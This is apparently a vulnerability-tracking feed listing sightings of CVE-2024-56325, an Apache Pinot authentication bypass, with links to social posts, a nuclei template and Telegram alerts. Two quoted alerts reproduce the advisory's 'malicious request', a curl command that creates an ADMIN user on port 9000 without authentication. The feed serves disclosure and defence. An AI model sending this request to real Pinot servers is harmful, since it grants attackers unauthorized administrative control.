https://db.gcve.eu/sightings/feed 2026-05-11T08:27:47.608887+00:00 Vulnerability-Lookup info@gcve.eu python-feedgen Contains only the most 10 recent sightings. https://db.gcve.eu/sighting/47559415-ee1d-43d3-853f-33019e8b21be/export 2026-05-11T08:27:47.776788+00:00 cedric http://db.gcve.eu/user/cedric {"uuid": "47559415-ee1d-43d3-853f-33019e8b21be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3llex5sozja2r", "content": "", "creation_timestamp": "2025-03-27T18:39:53.177535Z"} 2025-03-27T18:39:53.177535+00:00 https://db.gcve.eu/sighting/f9e6cb66-24f4-475b-aeae-2229fc41406e/export 2026-05-11T08:27:47.776739+00:00 cedric http://db.gcve.eu/user/cedric {"uuid": "f9e6cb66-24f4-475b-aeae-2229fc41406e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/securitylab-jp.bsky.social/post/3llnjekyxh226", "content": "", "creation_timestamp": "2025-03-31T04:27:09.066261Z"} 2025-03-31T04:27:09.066261+00:00 https://db.gcve.eu/sighting/a92eca59-6eb9-41cf-b2fa-a9d543047228/export 2026-05-11T08:27:47.776681+00:00 cedric http://db.gcve.eu/user/cedric {"uuid": "a92eca59-6eb9-41cf-b2fa-a9d543047228", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9868", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-56325\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Authentication Bypass Issue\n\nIf the path does not contain / and contain., authentication is not required.\n\nExpected Normal Request and Response Example\n\ncurl -X POST -H \"Content-Type: application/json\" -d {\\\"username\\\":\\\"hack2\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"} http://{server_ip}:9000/users \n\n\nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}\n\n\nMalicious Request and Response Example \n\ncurl -X POST -H \"Content-Type: application/json\" -d '{\\\"username\\\":\\\"hack\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .\n\n\nReturn: {\"users\":{}}\n\n\n\n \n\nA new user gets added bypassing authentication, enabling the user to control Pinot.\n\ud83d\udccf Published: 2025-04-01T09:07:14.185Z\n\ud83d\udccf Modified: 2025-04-01T09:07:14.185Z\n\ud83d\udd17 References:\n1. https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v", "creation_timestamp": "2025-04-01T09:32:42.000000Z"} 2025-04-01T09:32:42+00:00 https://db.gcve.eu/sighting/b2e2ba76-6802-4a18-a413-6faa89877407/export 2026-05-11T08:27:47.776632+00:00 cedric http://db.gcve.eu/user/cedric {"uuid": "b2e2ba76-6802-4a18-a413-6faa89877407", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114262869101590683", "content": "", "creation_timestamp": "2025-04-01T13:10:18.093633Z"} 2025-04-01T13:10:18.093633+00:00 https://db.gcve.eu/sighting/8600f9a0-5348-4dc9-9e62-799120b397db/export 2026-05-11T08:27:47.776582+00:00 cedric http://db.gcve.eu/user/cedric {"uuid": "8600f9a0-5348-4dc9-9e62-799120b397db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114262869101590683", "content": "", "creation_timestamp": "2025-04-01T13:10:18.096768Z"} 2025-04-01T13:10:18.096768+00:00 https://db.gcve.eu/sighting/81c2a461-a786-4c8a-b3ff-76797cc36071/export 2026-05-11T08:27:47.776517+00:00 cedric http://db.gcve.eu/user/cedric {"uuid": "81c2a461-a786-4c8a-b3ff-76797cc36071", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "published-proof-of-concept", "source": "https://t.me/cvedetector/21746", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-56325 - Apache Pinot Authentication Bypass\", \n \"Content\": \"CVE ID : CVE-2024-56325 \nPublished : April 1, 2025, 9:15 a.m. | 2\u00a0hours, 12\u00a0minutes ago \nDescription : Authentication Bypass Issue \n \nIf the path does not contain / and contain., authentication is not required. \n \nExpected Normal Request and Response Example \n \ncurl -X POST -H \"Content-Type: application/json\" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users \n \n \nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"} \n \n \nMalicious Request and Response Example \n \ncurl -X POST -H \"Content-Type: application/json\" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . \n \n \nReturn: {\"users\":{}} \n \n \n \n \n \nA new user gets added bypassing authentication, enabling the user to control Pinot. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"01 Apr 2025\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-04-01T13:37:52.000000Z"} 2025-04-01T13:37:52+00:00 https://db.gcve.eu/sighting/275142f2-e952-4d74-b6f8-e654b030b37d/export 2026-05-11T08:27:47.776463+00:00 cedric http://db.gcve.eu/user/cedric {"uuid": "275142f2-e952-4d74-b6f8-e654b030b37d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2024/CVE-2024-56325.yaml", "content": "", "creation_timestamp": "2025-04-03T13:16:13.000000Z"} 2025-04-03T13:16:13+00:00 https://db.gcve.eu/sighting/29ac1eb7-2b88-41a1-8efc-f015a6aa32e8/export 2026-05-11T08:27:47.776404+00:00 cedric http://db.gcve.eu/user/cedric {"uuid": "29ac1eb7-2b88-41a1-8efc-f015a6aa32e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3llzctfed6c2p", "content": "", "creation_timestamp": "2025-04-04T21:02:08.920503Z"} 2025-04-04T21:02:08.920503+00:00 https://db.gcve.eu/sighting/94efbc0d-c553-48db-ae2f-2a8618c262d8/export 2026-05-11T08:27:47.776323+00:00 cedric http://db.gcve.eu/user/cedric {"uuid": "94efbc0d-c553-48db-ae2f-2a8618c262d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lmif532gvs2p", "content": "", "creation_timestamp": "2025-04-10T20:53:12.140118Z"} 2025-04-10T20:53:12.140118+00:00 https://db.gcve.eu/sighting/a3537656-601a-4f5b-af48-b26dd41d6919/export 2026-05-11T08:27:47.775294+00:00 cedric http://db.gcve.eu/user/cedric {"uuid": "a3537656-601a-4f5b-af48-b26dd41d6919", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lmlupxwjxk24", "content": "", "creation_timestamp": "2025-04-12T06:10:15.134152Z"} 2025-04-12T06:10:15.134152+00:00